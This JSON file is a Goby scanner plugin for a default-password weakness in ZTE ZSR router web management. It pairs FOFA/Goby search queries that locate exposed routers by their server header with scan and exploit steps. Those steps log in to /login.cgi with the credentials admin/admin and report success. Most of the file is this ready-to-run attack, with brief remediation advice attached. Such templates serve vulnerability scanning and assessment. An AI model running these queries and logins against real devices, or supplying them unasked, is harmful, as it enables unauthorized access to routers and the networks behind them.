Goby/json/ZTE-ZSR-router-system-defau...

150 lines
5.0 KiB
JSON

{
"Name": "ZTE ZSR router system default password",
"Description": "<p>ZTE is the world's leading provider of integrated communications and information solutions, providing innovative technology and product solutions for global telecom operators, government and enterprise customers and consumers. The ZTE router web management system has a default password.<br></p>",
"Product": "Router Web Management System",
"Homepage": "https://www.zte.com.cn/",
"DisclosureDate": "2022-04-08",
"Author": "2935900435@qq.com",
"FofaQuery": "header=\"Server: ZTE/ROSNG\"|| banner=\"Server: ZTE/ROSNG\"",
"GobyQuery": "header=\"Server: ZTE/ROSNG\"|| banner=\"Server: ZTE/ROSNG\"",
"Level": "2",
"Impact": "<p>Attackers use this vulnerability to log in to the background of the system and obtain sensitive information.<br></p>",
"Recommendation": "<p>1. Change the user password in time</p><p>2. It is recommended to complicate the password</p>",
"References": [
"https://fofa.so/"
],
"Is0day": false,
"HasExp": true,
"ExpParams": [],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/login.cgi",
"follow_redirect": true,
"header": {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36",
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "Username=admin&Password=admin&EncryptType=plain&Language=chinese&MainFile=/pagefile/webgui/html/chinese/index.htm"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "menuTab",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/login.cgi",
"follow_redirect": true,
"header": {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36",
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "Username=admin&Password=admin&EncryptType=plain&Language=chinese&MainFile=/pagefile/webgui/html/chinese/index.htm"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "menuTab",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|text|user:admin pass:admin"
]
}
],
"Tags": [
"default password"
],
"VulType": [
"default password"
],
"CVEIDs": [
""
],
"CNNVD": [
""
],
"CNVD": [
""
],
"CVSSScore": "5",
"Translation": {
"CN": {
"Name": "中兴ZSR路由器系统默认口令",
"Product": "路由器Web管理系统",
"Description": "<p>中兴通讯全球领先的综合通信信息解决方案提供商,为全球电信运营商、政企客户和消费者提供创新的技术与产品解决方案。中兴路由器Web管理系统存在默认口令。<br></p>",
"Recommendation": "<p>1、及时修改用户口令<br></p><p>2、建议对口令进行复杂度化<br></p>",
"Impact": "<p>攻击者利用该漏洞登录系统后台,获取敏感信息。<br></p>",
"VulType": [
"默认口令"
],
"Tags": [
"默认口令"
]
},
"EN": {
"Name": "ZTE ZSR router system default password",
"Product": "Router Web Management System",
"Description": "<p>ZTE is the world's leading provider of integrated communications and information solutions, providing innovative technology and product solutions for global telecom operators, government and enterprise customers and consumers. The ZTE router web management system has a default password.<br></p>",
"Recommendation": "<p>1. Change the user password in time</p><p>2. It is recommended to complicate the password</p>",
"Impact": "<p>Attackers use this vulnerability to log in to the background of the system and obtain sensitive information.<br></p>",
"VulType": [
"default password"
],
"Tags": [
"default password"
]
}
},
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}